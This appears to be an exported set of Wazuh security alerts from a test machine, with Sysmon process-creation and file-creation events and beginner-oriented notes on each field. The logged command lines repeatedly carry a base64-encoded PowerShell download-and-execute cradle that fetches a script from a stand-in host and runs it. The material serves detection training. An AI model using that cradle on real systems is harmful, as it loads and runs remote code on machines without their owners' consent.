data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:45.6413370Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350971 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:42.931
ProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00}
ProcessId: 10312
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00}
ParentProcessId: 12292
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:42.931 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1aa-680a-060d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10312 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 138 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535407.2909767 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:45.8540677Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350972 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:45.841
ProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00}
ProcessId: 10312
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zaf4aluj.1ni.ps1
CreationUtcTime: 2025-04-24 22:56:45.841
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:45.841 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1aa-680a-060d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10312 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zaf4aluj.1ni.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:45.841 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 135 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535410.2912536 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:48.8881088Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351005 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:47.245
ProcessGuid: {94294ddc-c1af-680a-080d-000000000e00}
ProcessId: 11220
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00}
ParentProcessId: 10312
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:47.245 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1af-680a-080d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10312 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 139 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535411.2920607 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:49.1622433Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351006 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:49.119
ProcessGuid: {94294ddc-c1af-680a-080d-000000000e00}
ProcessId: 11220
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_i2msvjaf.2l2.ps1
CreationUtcTime: 2025-04-24 22:56:49.119
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:49.119 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1af-680a-080d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_i2msvjaf.2l2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:49.119 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 136 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535415.2923376 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:53.3837111Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351029 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:50.440
ProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00}
ProcessId: 9788
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1af-680a-080d-000000000e00}
ParentProcessId: 11220
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:50.440 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9788 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
